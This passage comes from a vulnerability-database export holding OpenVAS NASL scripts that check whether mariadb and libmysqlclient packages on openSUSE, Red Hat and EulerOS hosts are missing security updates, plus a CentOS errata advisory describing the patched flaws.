report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18\", rpm:\"libmysqlclient18~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo\", rpm:\"libmysqlclient18-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18\", rpm:\"libmysqlclient_r18~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld-devel\", rpm:\"libmysqld-devel~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18\", rpm:\"libmysqld18~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18-debuginfo\", rpm:\"libmysqld18-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench-debuginfo\", rpm:\"mariadb-bench-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client\", rpm:\"mariadb-client~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client-debuginfo\", rpm:\"mariadb-client-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debugsource\", rpm:\"mariadb-debugsource~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"mariadb-errormessages\", rpm:\"mariadb-errormessages~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test-debuginfo\", rpm:\"mariadb-test-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools\", rpm:\"mariadb-tools~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools-debuginfo\", rpm:\"mariadb-tools-debuginfo~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-32bit\", rpm:\"libmysqlclient18-32bit~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo-32bit\", rpm:\"libmysqlclient18-debuginfo-32bit~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18-32bit\", rpm:\"libmysqlclient_r18-32bit~10.0.29~18.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-08-04T00:00:00", "id": 
"OPENVAS:1361412562310871856", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871856", "type": "openvas", "title": "RedHat Update for mariadb RHSA-2017:2192-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2192-01_mariadb.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for mariadb RHSA-2017:2192-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871856\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:46:28 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2016-5483\", \"CVE-2016-5617\", \"CVE-2016-6664\", \"CVE-2017-3238\",\n \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\",\n \"CVE-2017-3291\", \"CVE-2017-3302\", \"CVE-2017-3308\", \"CVE-2017-3309\",\n \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\",\n \"CVE-2017-3453\", \"CVE-2017-3456\", 
\"CVE-2017-3464\", \"CVE-2017-3600\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for mariadb RHSA-2017:2192-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mariadb'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"MariaDB is a multi-user, multi-threaded SQL\n database server that is binary compatible with MySQL. The following packages\n have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)\n Security Fix(es): * It was discovered that the mysql and mysqldump tools did not\n correctly handle database and table names containing newline characters. A\n database user with privileges to create databases or tables could cause the\n mysql command to execute arbitrary shell or SQL commands while restoring\n database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\n * A flaw was found in the way the mysqld_safe script handled creation of error\n log file. The mysql operating system user could use this flaw to escalate their\n privileges to root. (CVE-2016-5617, CVE-2016-6664) * Multiple flaws were found\n in the way the MySQL init script handled initialization of the database data\n directory and permission setting on the error log file. The mysql operating\n system user could use these flaws to escalate their privileges to root.\n (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the\n ledir option value set in a MySQL configuration file. A user able to modify one\n of the MySQL configuration files could use this flaw to escalate their\n privileges to root. 
(CVE-2017-3291) * Multiple flaws were found in the way the\n mysqld_safe script handled creation of error log file. The mysql operating\n system user could use these flaws to escalate their privileges to root.\n (CVE-2017-3312) * A flaw was found in the way MySQL client library\n (libmysqlclient) handled prepared statements when server connection was lost. A\n malicious server or a man-in-the-middle attacker could possibly use this flaw to\n crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes\n several vulnerabilities in the MariaDB database server. Information about these\n flaws can be found on the Oracle Critical Patch Update Advisory page, listed in\n the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244,\n CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317,\n CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Additional Changes:\n For detailed information on changes in this release, see the Red Hat Enterprise\n Linux 7.4 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"mariadb on Red Hat Enterprise Linux Server (v. 
7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2192-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00015.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.56~2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, 
"vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171170", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1170)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1170\");\n script_version(\"2020-01-23T10:55:11+0000\");\n script_cve_id(\"CVE-2016-5483\", \"CVE-2016-5617\", \"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3302\", \"CVE-2017-3308\", \"CVE-2017-3309\", \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\", \"CVE-2017-3453\", \"CVE-2017-3456\", \"CVE-2017-3464\", \"CVE-2017-3600\", \"CVE-2017-3651\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:55:11 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:55:11 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1170)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1170\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1170\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'mariadb' package(s) announced via the EulerOS-SA-2017-1170 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\nA flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\nMultiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\nIt was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\nMultiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\nA flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\nThis update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. 
(CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\");\n\n script_tag(name:\"affected\", value:\"'mariadb' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.56~2\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", 
"CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "The remote host is missing an update for the Huawei EulerOS 'mariadb' package(s) announced via the EulerOS-SA-2017-1169 advisory.", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171169", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1169)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1169\");\n script_version(\"2020-01-23T10:54:51+0000\");\n script_cve_id(\"CVE-2016-5483\", \"CVE-2016-5617\", \"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3302\", \"CVE-2017-3308\", \"CVE-2017-3309\", \"CVE-2017-3312\", \"CVE-2017-3313\", \"CVE-2017-3317\", \"CVE-2017-3318\", \"CVE-2017-3453\", \"CVE-2017-3456\", \"CVE-2017-3464\", \"CVE-2017-3600\", \"CVE-2017-3651\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:54:51 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:54:51 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for mariadb (EulerOS-SA-2017-1169)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1169\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1169\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'mariadb' package(s) announced via the EulerOS-SA-2017-1169 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\nA flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\nMultiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\nIt was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\nMultiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)\n\nA flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\nThis update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. 
(CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\");\n\n script_tag(name:\"affected\", value:\"'mariadb' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-devel\", rpm:\"mariadb-devel~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-embedded\", rpm:\"mariadb-embedded~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-libs\", rpm:\"mariadb-libs~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-server\", rpm:\"mariadb-server~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~5.5.56~2\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:24:30", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", 
"CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2192\n\n\nMariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)\n\nSecurity Fix(es):\n\n* It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring a database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)\n\n* A flaw was found in the way the mysqld_safe script handled creation of the error log file when file-based logging is used. A local attacker who already has access to the mysql operating system user could use a symlink attack on the error log, and possibly other files, to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)\n\n* Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)\n\n* It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)\n\n* Multiple flaws were found in the way the mysqld_safe script handled creation of the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. 
(CVE-2017-3312)\n\n* A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004369.html\n\n**Affected packages:**\nmariadb\nmariadb-bench\nmariadb-devel\nmariadb-embedded\nmariadb-embedded-devel\nmariadb-libs\nmariadb-server\nmariadb-test\n\n**Upstream details at:**\n", "edition": 5, "modified": "2017-08-24T01:39:47", "published": "2017-08-24T01:39:47", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004369.html", "id": "CESA-2017:2192", "title": "mariadb security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:03:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3313", "CVE-2017-3302", "CVE-2017-3456", "CVE-2016-6662", "CVE-2017-3309", "CVE-2017-3308", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3651", "CVE-2016-5483", "CVE-2017-3453", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3258"], "description": "[1:5.5.56-2]\n- Do not fix context and change 
